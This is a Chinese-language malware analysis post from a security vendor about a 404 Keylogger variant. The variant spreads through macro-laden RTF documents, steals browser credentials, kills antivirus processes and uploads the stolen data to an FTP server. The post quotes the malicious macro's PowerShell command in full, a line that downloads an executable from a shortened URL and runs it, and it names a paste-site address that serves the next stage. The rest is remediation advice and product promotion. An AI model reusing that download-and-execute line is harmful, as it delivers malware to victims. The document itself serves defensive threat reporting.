404 Keylogger最新木马,盗取受害者浏览器网站帐号和密码

发布者:深信服千里目
发布于:2019-12-13 10:29

近日深信服安全团队捕获到一个最新的404 Keylogger木马变种,通过OFFICE文档嵌入恶意宏代码进行传播,盗取受害者浏览器的网站帐号和密码,深信服安全团队对此样本进行了详细分析,并获取到了黑客FTP服务器的帐号和密码,请大家提高安全意识,不要轻易打开未知的邮件附件及文档等。


样本是一个RTF文档,里面嵌套了OLE对象,包含恶意宏代码,如下所示:


恶意宏代码,会启动PowerShell进程,从远程服务器上下载恶意程序,然后执行,相关参数,如下:

powershell (NEw-objEctsystem.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”


分析下载的恶意程序,使用NET语言进行开发,首先会获取远程服务器地址:hxxps://paste.ee/r/RrkBF,如下所示:


读取远程服务器上的内容,如下所示:


直接加载执行远程服务器上的脚本,如下所示:


解密去混淆远程服务器上的脚本之后,同样是一个NET编写的程序,如下所示:


该程序主要功能是键盘记录,盗取受害者浏览器网站上的帐号和密码,会结束受害者主机上的浏览器相关进程,如下所示:


对抗杀软,结束相关安全软件进程,相关的安全软件进程有一百多个,如下所示:


将记录的浏览器上网站,以及相关的帐号和密码,然后发送到黑客远程FTPd服务器,如下所示:


该恶意程序还有截屏等操作,在分析该恶意程序的时候发现了黑客的FTP服务器地址,以及帐号和密码,登录进去,发现它已经盗取了部分受害者的主机信息,如下所示:


解决方案

病毒检测查杀


1、深信服EDR产品、下一代防火墙及安全感知平台等安全产品均具备病毒检测能力,部署相关产品用户可进行病毒检测,如图所示:


2、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。


64位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

 32位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防御


1、及时给电脑打补丁,及时升级应用程序,修复漏洞。


2、不要点击来源不明的邮件附件,不从不明网站下载软件。


3、深信服防火墙客户,建议升级到AF805版本,并开启人工智能引擎Save,以达到最好的防御效果。


4、使用深信服安全产品,接入安全云脑,使用云查服务可以即时检测防御新威胁。


5、深信服推出安全运营服务,通过以“人机共智”的服务模式帮助用户快速扩展安全能力,针对此类威胁安全运营服务提供设备安全设备策略检查、安全威胁检查、相关漏洞检查等服务,确保第一时间检测风险以及更新策略,防范此类威胁。


最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。推荐使用深信服安全感知+防火墙+EDR,对内网进行感知、查杀和防护。


声明:该文观点仅代表作者本人,转载请注明来自看雪